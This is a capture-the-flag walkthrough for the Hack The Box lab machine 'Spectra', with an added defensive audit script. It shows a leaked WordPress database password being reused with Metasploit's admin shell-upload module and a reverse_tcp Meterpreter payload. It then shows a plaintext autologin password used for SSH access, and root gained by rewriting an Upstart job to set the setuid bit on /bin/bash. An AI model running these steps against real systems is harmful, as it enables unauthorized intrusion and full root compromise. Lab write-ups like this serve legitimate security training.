
HTB Spectra Writeup

INFO

Machine IP = 10.10.10.229
OS = Other
Level = EASY
Points = 20

Add the machine's IP to your /etc/hosts file:

echo "10.10.10.229 spectra.htb" >> /etc/hosts

Scanning

nmap -sC -sV 10.10.10.229

Enumeration

Nmap:

22/tcp ssh  OpenSSH 8.1 (protocol 2.0)
80/tcp http nginx 1.17.4
1098/tcp filtered rmiactivation
3306/tcp mysql MySQL (unauthorized)

Port 80 – WordPress Blog

Create a directory Spectra, cd into it, then run Gobuster:

Gobuster:

gobuster dir -u http://10.10.10.229 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
/index.html           (Status: 200) [Size: 283]
/main                 (Status: 301) [Size: 169] [--> http://10.10.10.229/main/]
/testing              (Status: 301) [Size: 169] [--> http://10.10.10.229/testing/]

In /testing we find what looks like a backup of a WordPress config file (check the page source). You can download it with:

wget http://10.10.10.229/testing/wp-config.php.save

The important part is a user and password credential:

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

WordPress user enumeration with wpscan:

The second directory from Gobuster was main, which hosts a WordPress site:

wpscan --url http://spectra.htb/main/ --random-user-agent --enumerate u

So we have the user administrator:

[+] administrator
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Upload a Shell file with Metasploit:

msf6 > search wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost <Your IP here>
lhost => 10.10.15.26
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lport 4444
lport => 4444
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 10.10.10.229
rhosts => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /main
targeturi => /main
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

shell
/bin/sh -i

Or you can use:

python3 -c "import pty;pty.spawn('/bin/bash')"
nginx@spectra /tmp $ 

User Flag:

Let’s check for users:

nginx@spectra / $ cat /etc/passwd 
<SNIP>
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
nginx@spectra / $ ls -l /home/katie/
total 320
drwxr-xr-x 2 katie katie   4096 Jan 15 15:55 log
-r-------- 1 katie katie     33 Feb  2 15:57 user.txt

So we need to move from the restricted nginx user to katie to get the flag. After searching around the box, I found this in /opt:

-rw-r--r-- 1 root root  978 Feb  3 16:02 autologin.conf.orig

Let’s have a look at that first:

nginx@spectra /opt $ cat autologin.conf.orig
cat autologin.conf.orig

<SNIP>
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
<SNIP>

It’s a lengthy config script, but there’s a line in there that points us to /etc/autologin/passwd:

nginx@spectra /opt $ ls -l /etc/autologin
total 4
-rw-r--r-- 1 root root 19 Feb  3 16:43 passwd
nginx@spectra /opt $ cat /etc/autologin/passwd
SummerHereWeCome!!

Perfect. We’ve found a password which presumably is for katie as that’s the only other user on the box. Let’s try SSH:

ssh katie@spectra.htb
katie@spectra ~ $ cat user.txt

Root Flag:

Now we have to escalate our privileges. I’m going to check sudo privileges first and, if that fails, fall back to linPEAS:

katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl

What is initctl?

initctl allows a system administrator to communicate and interact with the Upstart init(8) daemon.

init is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes.

So we can use initctl to start and stop Upstart jobs, which run as root. That sounds like a nice simple way to get a root shell. First let’s see what’s in /etc/init:

katie@spectra /etc/init $ ls -l
total 752
...
-rw-rw---- 1 root developers  478 Jun 29  2020 test.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test1.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test10.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test2.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test3.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test4.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test5.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test6.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test7.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test8.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test9.conf
...

Let’s check out the first one:

katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author      "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js
end script
pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script
pre-stop script
    rm /var/run/nodetest.pid
    echo

We can replace the contents of this file with our own script; let’s have it set the setuid bit on /bin/bash so katie can run bash with root privileges.

First find the test process:

katie@spectra /etc/init $ sudo initctl list | grep test
test stop/waiting
test1 stop/waiting
test7 stop/waiting
test6 stop/waiting
test5 stop/waiting
test4 stop/waiting
test10 stop/waiting

It’s already stopped, so we can edit the conf file and then start it again:

katie@spectra /etc/init $ cat test.conf 
description "Test node.js server"
author      "katie"
start on filesystem or runlevel [...]
stop on shutdown

script
chmod +s /bin/bash
end script

Now we can start the process:

katie@spectra /etc/init $ sudo /sbin/initctl start test

Now we can simply run bash with the -p option to get our root shell:

katie@spectra /etc/init $ /bin/bash -p
bash-4.3# whoami
root
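As an added defender-side example, not part of the original writeup: a POSIX shell audit for the two weaknesses used above, namely Upstart job files in /etc/init that a non-root group can edit (each runs as root when started via initctl) and a setuid bit left on /bin/bash. It assumes a Linux host with GNU find and chmod; the directory arguments are assumptions that default to /etc/init and /bin.

```shell
#!/bin/sh
# Added audit script (not from the original writeup). Assumes GNU find/chmod.
# 1. Every /etc/init/*.conf is executed as root by initctl, so a job file
#    writable by a non-root group ("-rw-rw---- root developers test*.conf"
#    above) is a root shell for that group.
# 2. "chmod +s /bin/bash" leaves a persistent backdoor usable via "bash -p",
#    so check for setuid shells after an incident.

# Print *.conf files in DIR (default /etc/init) that are group- or
# world-writable. Returns 0 when none are found, 1 otherwise.
audit_upstart_jobs() {
    dir="${1:-/etc/init}"
    bad=$(find "$dir" -maxdepth 1 -name '*.conf' -perm /022 2>/dev/null | sort)
    [ -z "$bad" ] && return 0
    printf '%s\n' "$bad"
    return 1
}

# Remove group/other write from the job files so only root can change them.
# The "(ALL) SETENV: NOPASSWD: /sbin/initctl" sudo rule should go as well:
# with it, control over any job file is control over root.
fix_upstart_jobs() {
    dir="${1:-/etc/init}"
    find "$dir" -maxdepth 1 -name '*.conf' -perm /022 -exec chmod go-w {} +
}

# Print shells under DIR (default /bin) that carry the setuid bit.
# Returns 0 when none are found, 1 otherwise.
audit_setuid_shells() {
    dir="${1:-/bin}"
    bad=$(find "$dir" -maxdepth 1 -type f -perm -4000 \
            \( -name bash -o -name sh -o -name dash -o -name zsh \) 2>/dev/null | sort)
    [ -z "$bad" ] && return 0
    printf '%s\n' "$bad"
    return 1
}

# Run both checks against the live system when invoked with --run.
if [ "${1:-}" = "--run" ]; then
    audit_upstart_jobs && echo "upstart job files: ok"
    audit_setuid_shells && echo "setuid shells: ok"
fi
```

Run it as root with --run after reverting the box (or on any Upstart host); a non-empty listing from either check is the finding, and fix_upstart_jobs removes the write bits.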

Grab the root flag and we are done:

bash-4.3# cat /root/root.txt

Done!



This post is licensed under CC BY 4.0 by the author.